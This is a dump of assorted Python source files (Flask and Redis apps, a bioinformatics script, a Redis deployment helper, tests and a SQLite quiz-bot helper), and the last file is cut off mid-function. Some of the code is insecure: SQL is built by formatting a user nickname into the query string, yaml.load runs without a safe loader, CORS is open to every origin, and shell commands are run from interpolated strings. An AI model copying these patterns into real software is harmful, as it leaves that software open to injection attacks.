+{"seq_id":"367645107","text":"import logging\nimport os\nimport yaml\nimport time\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom .models import db\nfrom .controller import routes, helpers, errors\n\nlogger = logging.getLogger(__name__)\n\ndef create_app(debug=False, raise_errors=False):\n app = Flask(__name__)\n\n # set debug mode\n app.debug = debug\n\n # raise app errors\n app.config['RAISE_ERRORS'] = raise_errors\n\n # register default encoder\n app.json_encoder = helpers.JSONEncoder\n\n # register error handler\n errors.register_error_handlers(app)\n\n # configure logging\n configure_logging(debug=debug)\n\n # configure app\n configure_flask(app=app)\n\n # bind database\n db.init_app(app)\n\n # register blueprints\n app.register_blueprint(routes.health_check.bp, url_prefix='')\n app.register_blueprint(routes.auth.bp, url_prefix='/auth')\n app.register_blueprint(routes.user.bp, url_prefix='/user')\n app.register_blueprint(routes.team.bp, url_prefix='/team')\n app.register_blueprint(routes.tag.bp, url_prefix='/tag')\n app.register_blueprint(routes.post.bp, url_prefix='/post')\n app.register_blueprint(routes.search.bp, url_prefix='/search')\n\n # Configure CORS\n CORS(app,origins=['*'])\n\n return app\n\n\ndef configure_flask(app):\n assert 'FLASK_CONFIG' in os.environ, 'missing FLASK_CONFIG in environment'\n fp = os.environ.get('FLASK_CONFIG')\n\n assert os.path.exists(fp), 'CANNOT FIND FLASK CONFIG \"{fp}\"'.format(fp=fp)\n\n # assert, 'bad flask config \"fp\"'\n logger.debug('reading config \"{fp}\"'.format(fp=fp))\n\n with open(fp, 'r') as f:\n conf_obj = yaml.load(f)\n\n app.config['AUTH_TOKEN_EXP'] = conf_obj.get('token_exp') or 60*60*24\n app.config['APP_START_TIME'] = time.time()\n app.config['SECRET_KEY'] = conf_obj['secret_key']\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['SQLALCHEMY_POOL_RECYCLE'] = 3600 # reset db connections after an hour\n app.config['EXTERNAL_URL'] = conf_obj['external_url']\n # app.config['SERVER_NAME'] = conf_obj['external_url']\n app.config['SQLALCHEMY_DATABASE_URI'] = conf_obj['db']['url']\n app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False\n\n\ndef configure_logging(debug=False):\n h = logging.StreamHandler()\n fmt = logging.Formatter(\n fmt='%(asctime)s %(levelname)s (%(name)s) %(message)s',\n datefmt='%Y-%m-%dT%H:%M:%S'\n )\n h.setFormatter(fmt)\n\n root = logging.getLogger()\n root.addHandler(h)\n\n if debug:\n root.setLevel(logging.DEBUG)\n else:\n root.setLevel(logging.INFO)\n\ndef get_rules():\n app = create_app()\n with app.app_context():\n endpoints = []\n for rule in app.url_map.iter_rules():\n endpoints.append(rule.rule)\n endpoints.sort()\n return endpoints\n\ndef reset_db():\n app = create_app()\n with app.app_context():\n logger.info('dropping tables')\n db.drop_all()\n logger.info('creating tables')\n db.create_all()\n\ndef create_db():\n app = create_app()\n with app.app_context():\n logger.info('creating tables')\n db.create_all()\n","sub_path":"server/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"480707864","text":"import pandas as pd\nimport sys\nfrom os.path import exists, join,expanduser,basename\nfrom tqdm import tqdm\nfrom api_tools.itol_func import *\nfrom glob import glob\nfrom ete3 import Tree\nimport plotly.express as px\nfrom ete3 import NCBITaxa\nfrom global_search.classification_script import _classificated\nfrom subprocess import check_call\nimport os\n\nncbi = NCBITaxa()\n\nblastp_pth = '/home-user/software/blast/latest/bin/blastp'\ndef run(cmd):\n check_call(cmd,shell=1)\n \ndef reformat(s):\n a = s.split('_')[-1]\n if not '_' in s:\n return s\n try:\n float(a)\n return s\n except:\n if len(s.rpartition('_')[-1]) == 1:\n return s\n else:\n return s.rpartition('_')[0]\nunder_nodes = {'nxrA':['I49_S100', 'I137_S88', 'I88_S99', 'I71_S100'],\n 'hao':['I16_S100','I14_S90','I17_S100'],\n 'amoA':['I43_S100','I30_S100',\n #'I15_S76'\n ],\n 'amoB':['I44_S89','I71_S100',\n #'I14_S100','I16_S100'\n ],\n 'amoC':['I12_S100','I57_S59'],\n }\n\nall_files = ['nr_retrieve_amoB/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_amoC/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/iqtree.treefile',\n 'with_genome_amoA/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_hao/with_genome_Bacteria_intact.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_nxrA/with_genome_Bacteria_drop_NC10_intact_lt_600.faa_aln.dir/iqtree.treefile',\n 'nr_retrieve_nirK/with_genome_Bacteria_drop_NC10_intact.faa_aln.dir/cluster_90_aln.dir/iqtree.treefile',\n ]\n\n\n\n# check_call('python3 ~/script/evolution_relative/global_search/reannotate_tree.py '+ ' '.join(all_files),shell=1)\nfrom collections import defaultdict\ng_genomes = defaultdict(list)\ngenome2id = []\nreformat_id2ori = {} # mapping dict for reformatted leaf\nmanuall_class_ids = [] # manually assigned node for annotation.\nfor f in all_files:\n g = f.split('/')[0].split('_')[-1]\n tree = glob(join(f,'*.sorted.newick'))[0]\n t = Tree(tree,format=1)\n all_ids = [reformat(_).strip() for _ in t.get_leaf_names()]\n if under_nodes.get(g,[]):\n _ns = [_ \n for _ in t.iter_descendants() \n if _.name in under_nodes.get(g,[])]\n for _n in _ns:\n manuall_class_ids += list(_n.get_leaf_names())\n manuall_class_ids = [reformat(_).strip() for _ in manuall_class_ids]\n else:\n manuall_class_ids = all_ids[::]\n reformat_id2ori.update(dict(zip(all_ids,\n [_ for _ in t.get_leaf_names()])))\n pro2genome = pd.read_csv(join(f,'info_dir','pro2genome.tab'),\n sep='\\t',index_col=0)\n pro2genome = pro2genome.fillna('None')\n for gene in all_ids:\n if gene in pro2genome.index:\n _cache = pro2genome.loc[gene,'assembly_ID']\n if isinstance(_cache,str) and _cache !='None':\n genome2id.append((_cache,gene))\n if gene in manuall_class_ids:\n g_genomes[g].append(_cache)\n elif str(_cache) == 'None':\n print(gene,g)\n else:\n if gene in manuall_class_ids:\n g_genomes[g] += list(_cache)\n genome2id += [(_g,gene) for _g in list(_cache)]\n else:\n print(gene,g)\n\n\n\ngenome2genes = defaultdict(list)\nfor g,genomes in g_genomes.items():\n for genome in genomes:\n if genome !='None':\n genome2genes[genome].append(g)\n\nid2genes = {}\nfor genome,genes in genome2genes.items():\n ids = [id \n for g,id in genome2id \n if g == genome]\n id2genes.update({id:list(set(genes)) \n for id in ids})\n\ninfo2style = {'amoA':{'color':'#ff0000',\n 'info':'amoA'},\n 'amoB':{'color':'#ff0000',\n 'info':'amoB'},\n 'amoC':{'color':'#ff0000',\n 'info':'amoC'},\n 'hao':{'color':'#b68100',\n 'info':'hao'},\n 'cycA':{'color':'#b68100',\n 
'info':'cycA'},\n 'cycB':{'color':'#b68100',\n 'info':'cycB'},\n 'nxrA':{'color':'#4b85c1',\n 'info':'nxrA'},\n }\n#odir = ''\nfor f in all_files:\n g = f.split('/')[0].split('_')[-1]\n tree = glob(join(f,'*.sorted.newick'))[0]\n t = Tree(tree,format=1)\n all_ids = [reformat(_).strip() for _ in t.get_leaf_names()]\n \n this_id2genes = {reformat_id2ori[_]:id2genes.get(_,[]) \n for _ in all_ids \n if _ in id2genes}\n all_text = to_binary_shape(this_id2genes,\n info2style,\n info_name='genes set',manual_v=['amoA','amoB','amoC','hao','nxrA'])\n with open(join(f,'gene_set.txt'),'w') as f1:\n f1.write(all_text)\n\n\n# new confirmed and extendable workflow after download all genomes...\nremained_g = []\ndownload_dir = expanduser('~/data/nitrification_for/genome_protein_files')\nfor genome,genes in genome2genes.items():\n download_faa = glob(join(download_dir,f\"*{genome.split('_')[1].split('.')[0]}*\"))\n if not download_faa:\n # if not, should be download and go on\n print(genome.replace('GCF','GCA'))\n remained_g.append(genome.replace('GCF','GCA'))\n\n# step1. annotate gene to genome.\nnew_genome2id = [(genome.split('_')[-1].replace('.','v'),id) for genome,id in genome2id]\n# step2. annotate requested gene(for extract), do not modify manually classified one.\ntmp_dir = join('./tmp/contained_genes/')\nredo = False\nif not exists(tmp_dir):\n os.makedirs(tmp_dir)\ndb_faa = join(dirname(download_dir),'concat_all_protein.faa')\ncollected_gs = expanduser('~/project/nitrogen_cycle/curated_genes/')\ngenome2collect_genes = defaultdict(list)\nfor fa in tqdm(glob(join(collected_gs,'*.faa'))):\n gene_name = basename(fa).replace('.faa','').strip()\n otab = join(tmp_dir,basename(fa).replace('.faa','').strip()+'.tab')\n if (not exists(otab)) or redo:\n cmd = f\"{blastp_pth} -query '{fa}' -db {db_faa} -out {otab} -num_threads 20 -outfmt 6 -evalue 1e-50\"\n run(cmd)\n for row in open(otab):\n genome_name = row.split(\"\\t\")[1].split('_')[0]\n genome2collect_genes[genome_name].append(gene_name)\ngenome2collect_genes = {k:set(v) for k,v in genome2collect_genes.items()}\n\n\n# \nextra_g = ['cycA','cycB']\nfor f in all_files:\n g = f.split('/')[0].split('_')[-1]\n tree = glob(join(f,'*.sorted.newick'))[0]\n t = Tree(tree,format=1)\n all_ids = [reformat(_).strip() for _ in t.get_leaf_names()]\n\n this_id2genes = {reformat_id2ori[_]:id2genes.get(_,[])\n for _ in all_ids\n if _ in id2genes}\n for id in all_ids:\n genes = this_id2genes.get(reformat_id2ori[id],[])\n genomes = [genome for genome,_id in new_genome2id if id == _id]\n for _g in genomes:\n _c = genes + list(genome2collect_genes.get(_g,set()).intersection(set(extra_g)))\n if _c:\n this_id2genes[id] = _c\n for id in list(this_id2genes):\n v = this_id2genes[id]\n if (len(v)==1 and g in v) or (not v):\n this_id2genes.pop(id)\n all_text = to_binary_shape(this_id2genes,\n info2style,\n info_name='genes set',\n manual_v=['amoA','amoB','amoC','hao','cycA','cycB','nxrA'])\n with open(join(f,'gene_set.txt'),'w') as f1:\n f1.write(all_text)\n","sub_path":"global_search/reannotate_genes_contains_info.py","file_name":"reannotate_genes_contains_info.py","file_ext":"py","file_size_in_byte":7677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"333077332","text":"# Copyright (C) 2022, Mykola Grymalyuk\n# Check whether new updates are available for OpenCore Legacy Patcher binary\n# Call check_binary_updates() to determine if any updates are available\n# Returns dict with Link and Version of the latest binary update if available\nimport requests\nimport logging\n\nfrom resources import network_handler\n\n\nclass check_binary_updates:\n def __init__(self, constants):\n self.constants = constants\n self.binary_version = self.constants.patcher_version\n self.binary_version_array = self.binary_version.split(\".\")\n self.binary_version_array = [int(x) for x in self.binary_version_array]\n self.binary_url = \"https://api.github.com/repos/dortania/OpenCore-Legacy-Patcher/releases/latest\"\n\n self.available_binaries = {}\n\n\n def check_if_build_newer(self, remote_version=None, local_version=None):\n if remote_version is None:\n remote_version = self.remote_version_array\n if local_version is None:\n local_version = self.binary_version_array\n\n # Pad version numbers to match length (ie. 0.1.0 vs 0.1.0.1)\n while len(remote_version) > len(local_version):\n local_version.append(0)\n while len(remote_version) < len(local_version):\n remote_version.append(0)\n\n for i in range(0, len(remote_version)):\n if int(remote_version[i]) < int(local_version[i]):\n break\n elif int(remote_version[i]) > int(local_version[i]):\n return True\n\n return False\n\n def determine_local_build_type(self):\n if self.constants.wxpython_variant is True:\n return \"GUI\"\n else:\n return \"TUI\"\n\n def determine_remote_type(self, remote_name):\n if \"TUI\" in remote_name:\n return \"TUI\"\n elif \"GUI\" in remote_name:\n return \"GUI\"\n else:\n return \"Unknown\"\n\n def check_binary_updates(self):\n # logging.info(\"- Checking for updates...\")\n if network_handler.NetworkUtilities(self.binary_url).verify_network_connection():\n # logging.info(\"- Network connection functional\")\n response = requests.get(self.binary_url)\n data_set = response.json()\n # logging.info(\"- Retrieved latest version data\")\n self.remote_version = data_set[\"tag_name\"]\n # logging.info(f\"- Latest version: {self.remote_version}\")\n self.remote_version_array = self.remote_version.split(\".\")\n self.remote_version_array = [\n int(x) for x in self.remote_version_array\n ]\n if self.check_if_build_newer() is True:\n # logging.info(\"- Remote version is newer\")\n for asset in data_set[\"assets\"]:\n logging.info(f\"- Found asset: {asset['name']}\")\n if self.determine_remote_type(asset[\"name\"]) == self.determine_local_build_type():\n # logging.info(f\"- Found matching asset: {asset['name']}\")\n self.available_binaries.update({\n asset['name']: {\n \"Name\":\n asset[\"name\"],\n \"Version\":\n self.remote_version,\n \"Link\":\n asset[\"browser_download_url\"],\n \"Type\":\n self.determine_remote_type(asset[\"name\"]),\n \"Github Link\":\n f\"https://github.com/dortania/OpenCore-Legacy-Patcher/releases/{self.remote_version}\"\n }\n })\n break\n if self.available_binaries:\n return self.available_binaries\n else:\n # logging.info(\"- No matching binaries available\")\n return None\n # else:\n # logging.info(\"- Failed to connect to GitHub API\")\n return None","sub_path":"resources/updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"379275066","text":"'''\n实现仿射变换相关的操作\n'''\nimport numpy as np\nimport cv2,os\n\n\nif __name__=='__main__':\n img_path = r\"F:\\post_graduate_design\\postgraduate_continue\\imgaug_and_expand_res\\image_expand\\orgdata_without_CLAHE\"\n save_path = r\"F:\\post_graduate_design\\postgraduate_continue\\imgaug_and_expand_res\\image_expand\\affine_change\"\n img_list = os.listdir(img_path)\n for each_img in img_list:\n each_img_path = os.path.join(img_path, each_img)\n img = cv2.imread(each_img_path,0)\n img1 = cv2.flip(img, 1) # 镜像\n '''\n 参数2 必选参数。用于指定镜像翻转的类型,其中0表示绕×轴正直翻转,即垂直镜像翻转;1表示绕y轴翻转,即水平镜像翻转;-1表示绕×轴、y轴两个轴翻转,即对角镜像翻转。\n 参数3 可选参数。用于设置输出数组,即镜像翻转后的图像数据,默认为与输入图像数组大小和类型都相同的数组。\n '''\n cv2.imwrite(save_path + '/' + each_img, img1)","sub_path":"image_operation/affine_change.py","file_name":"affine_change.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"199716350","text":"# Copyright 2011 Julien Duponchelle .\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Elastic Search Pipeline for scrappy\"\"\"\n\nfrom pyes import ES\nimport hashlib\nfrom scrapy.conf import settings\nfrom scrapy import log\n\nclass ElasticSearchPipeline(object):\n def __init__(self):\n uri = \"%s:%d\" % (settings['ELASTICSEARCH_SERVER'], settings['ELASTICSEARCH_PORT'])\n self.es = ES([uri])\n\n def process_item(self, item, spider):\n if self.__get_uniq_key() is None:\n self.es.index(dict(item), settings['ELASTICSEARCH_INDEX'], settings['ELASTICSEARCH_TYPE'])\n else:\n self.es.index(dict(item), settings['ELASTICSEARCH_INDEX'], settings['ELASTICSEARCH_TYPE'],\n hashlib.sha1(item[self.__get_uniq_key()]).hexdigest())\n log.msg(\"Item send to Elastic Search %s\" %\n (settings['ELASTIC_SEARCH_INDEX']),\n level=log.DEBUG, spider=spider) \n return item\n\n def __get_uniq_key(self):\n if not settings['ELASTICSEARCH_UNIQ_KEY'] or settings['ELASTICSEARCH_UNIQ_KEY'] == \"\":\n return None\n return settings['ELASTICSEARCH_UNIQ_KEY']\n \n","sub_path":"scrapyelasticsearch.py","file_name":"scrapyelasticsearch.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"604656389","text":"from pathlib import Path\n\nfrom unv.utils.tasks import register\n\nfrom ...tasks import DeployTasks\nfrom ...settings import DeployComponentSettings\n\nfrom ..systemd import SystemdTasksMixin\n\n\nclass RedisSettings(DeployComponentSettings):\n NAME = 'redis'\n SCHEMA = {\n 'user': {'type': 'string', 'required': False},\n 'systemd': SystemdTasksMixin.SCHEMA,\n 'config': {\n 'type': 'dict',\n 'schema': {\n 'template': {'type': 'string', 'required': True},\n 'name': {'type': 'string', 'required': True}\n }\n },\n 'workdir': {'type': 'string', 'required': True},\n 'port': {'type': 'integer', 'required': True},\n 'maxmemory': {'type': 'string', 'required': True},\n 'databases': {'type': 'integer', 'required': True},\n 'root': {'type': 'string', 'required': True},\n 'packages': {\n 'type': 'dict',\n 'schema': {\n 'redis': {'type': 'string', 'required': True},\n },\n 'required': True\n },\n 'listen_private_ip': {'type': 'boolean', 'required': False},\n 'iptables': {\n 'type': 'dict',\n 'schema': {\n 'v4': {'type': 'string', 'required': True},\n },\n 'required': True\n },\n }\n DEFAULT = {\n 'systemd': {\n 'template': 'server.service',\n 'name': 'redis.service',\n 'boot': True,\n 'instances': {'count': 1}\n },\n 'config': {\n # http://download.redis.io/redis-stable/redis.conf\n 'template': 'server.conf',\n 'name': 'redis.conf'\n },\n\n # TODO: move to base config (base package for this type of components)\n 'workdir': '.',\n 'port': 6379,\n 'maxmemory': '64mb',\n 'databases': 16,\n 'root': 'app',\n 'packages': {\n 'redis': 'http://download.redis.io/releases/redis-6.2.5.tar.gz'\n },\n 'iptables': {\n 'v4': 'ipv4.rules'\n }\n }\n\n @property\n def build_dir(self):\n return self.home_abs / 'build'\n\n @property\n def bin(self):\n return self.root_abs / 'bin' / 'redis-server'\n\n @property\n def packages(self):\n return self._data['packages']\n\n @property\n def config_template(self):\n template = self._data['config']['template']\n if not template.startswith('/'):\n template = (self.local_root / template).resolve()\n return Path(template)\n\n @property\n def config_path(self):\n return self.root_abs / self._data['config']['name']\n\n @property\n def workdir(self):\n return self.root_abs / self._data['workdir']\n\n @property\n def port(self):\n return self._data['port']\n\n @property\n def maxmemory(self):\n return self._data['maxmemory']\n\n @property\n def databases(self):\n return self._data['databases']\n\n @property\n def iptables_v4_rules(self):\n return (self.local_root / self._data['iptables']['v4']).read_text()\n\n @property\n def listen_private_ip(self):\n return self._data.get('listen_private_ip', False)\n\n\nSETTINGS = RedisSettings()\n\n\nclass RedisTasks(DeployTasks, SystemdTasksMixin):\n SETTINGS = RedisSettings\n\n async def get_iptables_template(self):\n return self.settings.iptables_v4_rules\n\n @register\n async def benchmark(self, connections: int = 200):\n print(await self._run(\n f'{self.settings.bin.parent / \"redis-benchmark\"} -c {connections} '\n f'-h {self.public_ip} -p {self.settings.port} '\n '-t SET,GET,INCR -n 1000000 -P 100 --csv'\n ))\n\n @register\n async def build(self):\n await self._apt_install(\n 'build-essential', 'sysfsutils', 'libsystemd-dev',\n 'libjemalloc-dev', 'rsync'\n )\n await self._create_user()\n\n with self._set_user('root'):\n await self._run(\n 'echo \"kernel/mm/transparent_hugepage/enabled = never\" '\n '>> /etc/sysfs.conf'\n )\n await self._run(\n 'echo \"vm.overcommit_memory=1\" >> /etc/sysctl.conf')\n await 
self._run(\n 'echo \"net.core.somaxconn=65535\" >> /etc/sysctl.conf')\n await self._run('echo \"fs.file-max=100000\" >> /etc/sysctl.conf')\n await self._run('sysctl -p')\n await self._run('systemctl force-reload sysfsutils')\n\n async with self._cd(self.settings.build_dir, temporary=True):\n for package, url in self.settings.packages.items():\n await self._download_and_unpack(url, Path('.', package))\n\n async with self._cd('redis'):\n await self._run('make distclean')\n await self._run(\n \"make -j$(nproc) USE_SYSTEMD=yes MALLOC=jemalloc\")\n await self._run(\n f\"make PREFIX={self.settings.root_abs} install\")\n\n @register\n async def sync(self):\n await self._upload_template(\n self.settings.config_template, self.settings.config_path)\n await self._sync_systemd_units()\n\n @register\n async def setup(self):\n await self.build()\n await self.sync()\n await self.start()\n","sub_path":"src/unv/deploy/components/redis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"80826161","text":"import os\n\nimport redis\nfrom flask import Flask, request, jsonify\n \napi = Flask(__name__)\n\nr = redis.StrictRedis(host=os.environ['OPENSHIFT_REDIS_HOST'],\n port=os.environ['OPENSHIFT_REDIS_PORT'],\n password=os.environ['REDIS_PASSWORD'],\n db=0)\n\nprice_per_cig = 100\n\n@api.route('/')\ndef index():\n return api.send_static_file('index.html')\n\n@api.route('/update')\ndef update():\n cravings = r.lrange('cravings:1000', 0, -1)\n incidents = r.lrange('incidents:1000', 0, -1)\n savings = r.get('savings:1000')\n last_craving = r.lindex('cravings:1000', -1)\n last_incident = r.lindex('incidents:1000', -1)\n longest_streak = r.get('longest_streak:1000')\n return jsonify(cravings=cravings, incidents=incidents, savings=savings,\n last_craving=last_craving, last_incident=last_incident,\n longest_streak=longest_streak)\n\n@api.route('/cravings', methods=['POST'])\ndef post_cravings():\n timestamp = request.get_json()['timestamp']\n r.rpush('cravings:1000', timestamp)\n r.incr('savings:1000', amount=price_per_cig)\n return update()\n\n@api.route('/incidents', methods=['POST'])\ndef post_incidents():\n timestamp = request.get_json()['timestamp']\n r.rpush('incidents:1000', timestamp)\n r.decr('savings:1000', amount=price_per_cig)\n return update()\n \nif __name__ == '__main__':\n api.run(debug=True)\n \n","sub_path":"wsgi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"293651847","text":"\"\"\"\nCopyright (2017) Chris Scuderi\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport socket\nimport json\nimport os\n\nSOCKFILE = \"/tmp/alarm_socket\"\n\n\ndef start_socket_server():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(SOCKFILE)\n s.listen(5)\n return s\n\n\ndef start_socket_client():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.connect(SOCKFILE)\n return s\n\n\ndef send(sock, obj):\n msg = json.dumps(obj)\n packet = '%05d%s' % (len(msg), msg)\n sock.sendall(packet)\n\n\ndef recv(sock):\n msg_len = int(sock.recv(5))\n msg = ''\n while len(msg) < msg_len:\n chunk = sock.recv(msg_len - len(msg))\n assert chunk != ''\n msg = msg + chunk\n\n return json.loads(msg)\n\n\ndef cleanup_socket_server(sock):\n sock.close()\n os.remove(SOCKFILE)\n","sub_path":"alarm_central_station_receiver/json_ipc.py","file_name":"json_ipc.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"386530608","text":"from datetime import date, datetime\n\nimport pytest\nfrom figure_parser.errors import OrderPeriodError\nfrom figure_parser.extension_class import (HistoricalReleases, OrderPeriod,\n Price, Release)\nfrom pytest_mock import MockerFixture\n\n\nclass TestRelease:\n def test_release_class(self, mocker: MockerFixture):\n mocker.patch('figure_parser.extension_class.Price', int)\n r1 = Release(release_date=date(2020, 1, 1), price=Price(10000))\n\n assert hasattr(r1, \"release_date\")\n assert hasattr(r1, \"price\")\n assert hasattr(r1, \"announced_at\")\n\n\ndef test_release_info_class(mocker: MockerFixture):\n mocker.patch('figure_parser.extension_class.Price', int)\n first_release = Release(release_date=date(2020, 1, 1), price=Price(10000))\n second_release = Release(release_date=date(2020, 2, 1), price=Price(12000))\n third_release = Release(release_date=None, price=Price(12000))\n date_price_combos = [first_release, second_release, third_release]\n sorted_combos = [third_release, first_release, second_release]\n\n hr = HistoricalReleases()\n hr.append(first_release)\n hr.append(second_release)\n hr.append(third_release)\n\n assert hr == date_price_combos\n\n hr.sort()\n assert hr == sorted_combos\n\n last_release = hr.last()\n assert last_release.release_date == date(2020, 2, 1)\n assert last_release.price == 12000\n\n hr2 = HistoricalReleases()\n assert not hr2.last()\n\n\nclass TestOrderPeriod:\n def test_is_available(self):\n start = datetime(1990, 1, 1)\n end = datetime(2000, 1, 1)\n\n order_period = OrderPeriod(start, end)\n assert not order_period.is_available\n\n def test_is_available_at_specific_time(self):\n start = datetime(2020, 2, 2, 9, 0)\n end = datetime(2020, 3, 2, 23, 0)\n\n now = datetime(2020, 2, 22, 5, 34)\n\n order_period = OrderPeriod(start, end)\n assert order_period.is_available_at(now)\n assert now in order_period\n\n def test_default_value(self):\n order_period = OrderPeriod()\n assert not order_period.start\n assert not order_period.end\n\n def test_checker(self):\n with pytest.raises(OrderPeriodError):\n OrderPeriod(datetime(2000, 1, 1), datetime(1999, 1, 1))\n\n def test_none_of_one(self):\n OrderPeriod(None, datetime(2000, 1, 1))\n OrderPeriod(datetime(2020, 1, 1), None)\n\n def test_bool(self):\n assert not bool(OrderPeriod(None, None))\n assert OrderPeriod(None, datetime(2000, 1, 1))\n assert OrderPeriod(datetime(2020, 1, 1), None)\n assert OrderPeriod(datetime(2020, 1, 1), datetime(2022, 1, 1))\n\n\nclass TestPrice:\n def test_is_int(self):\n price = Price(300)\n assert isinstance(price, int)\n\n def test_price_always_be_postive(self):\n price = Price(-21323)\n assert price == 21323\n\n def test_price_has_tax_including_attribute(self):\n price = Price(500)\n assert hasattr(price, 'tax_including')\n","sub_path":"libs/figure_parser/tests/test_custom_class.py","file_name":"test_custom_class.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"208390757","text":"\"\"\"pytelegram-quizbot DB helper\"\"\"\n\nimport logging\nimport sqlite3\nfrom collections import OrderedDict\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef create_db_connection(db_file):\n \"\"\"\n Creates connection to SQLite3 DB\n\n :param db_file: path to DB (string)\n :return: sqlite3.connect object\n \"\"\"\n try:\n conn = sqlite3.connect(db_file, check_same_thread=False)\n return conn\n except sqlite3.Error as e:\n logger.error(e)\n\n return None\n\n\ndef create_table(conn, table_name, fields):\n \"\"\"\n Creates table if not exist\n\n :param conn: sqlite3 connection handler\n :param table_name: table name\n :param fields: table fields\n :return:\n \"\"\"\n cols = \"(\" + ','.join(fields) + \")\"\n sql_command = 'CREATE TABLE if not exists ' + table_name + cols\n\n c = conn.cursor()\n c.execute(sql_command)\n\n conn.commit()\n\n\ndef db_get_question(conn, iterator):\n \"\"\"\n Obtains questions from DB\n\n :param conn: sqlite3 connection handler\n :param iterator: number of question (int)\n :return: dict of questions\n \"\"\"\n c = conn.cursor()\n try:\n c.execute(\"SELECT * FROM questions\")\n except Exception as e:\n logger.error(e)\n\n rows = c.fetchall()\n if iterator < len(rows):\n question = rows[iterator][0]\n correct = rows[iterator][1]\n inn1 = rows[iterator][2]\n inn2 = rows[iterator][3]\n inn3 = rows[iterator][4]\n return {\"question\": question, \"correct\": correct, \"incorrect\": [inn1, inn2, inn3]}\n else:\n return \"End\"\n\n\ndef post_score(conn, uid, nickname, score):\n \"\"\"\n Updates user score\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :param nickname: user nickname\n :param score: user score\n :return: None\n \"\"\"\n c = conn.cursor()\n\n create_table(conn, \"leaderboard\", [\"id INTEGER\", \"name TEXT\", \"score INTEGER DEFAULT 0\"])\n data = check_if_exist(conn, uid, \"leaderboard\")\n if data == 0:\n sql = '''\n INSERT INTO leaderboard(id,name,score)\n VALUES(\n CAST({} as integer),\n '{}',\n {})\n '''.format(uid, nickname, score)\n else:\n sql = '''\n UPDATE leaderboard\n SET score = (SELECT score FROM leaderboard WHERE id = {}) + {}\n WHERE id = {}\n '''.format(uid, score, uid)\n c.execute(sql)\n conn.commit()\n\n\ndef check_if_exist(conn, uid, table):\n \"\"\"\n Check if table has any rows with user id\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :param table: table name\n :return: number of rows containing user id\n \"\"\"\n c = conn.cursor()\n sql = \"SELECT count(*) FROM {} WHERE id = {}\".format(table, uid)\n c.execute(sql)\n data = c.fetchone()[0]\n return data\n\n\ndef get_leaderboard(conn, uid):\n \"\"\"\n Get 3 highest scores + user score if not in those 3\n\n :param conn: sqlite3 connection handler\n :param uid: user id\n :return: dict of 3 highest scores + user score if not in those 3\n \"\"\"\n scores = OrderedDict()\n cur = conn.cursor()\n try:\n cur.execute(\"SELECT * FROM leaderboard ORDER BY score DESC LIMIT 3\")\n except sqlite3.OperationalError as e:\n if \"no such table\" in str(e):\n create_table(conn, \"leaderboard\", [\"id INTEGER\", \"name TEXT\", \"score INTEGER DEFAULT 0\"])\n\n rows = cur.fetchall()\n\n for place, (id, name, score) in enumerate(rows, 1):\n scores[id] = {'place': place, 'name': name, 'score': score}\n if uid not in scores.keys():\n personal_score = get_score(conn, uid)\n scores[personal_score[0]] = personal_score[1]\n return 
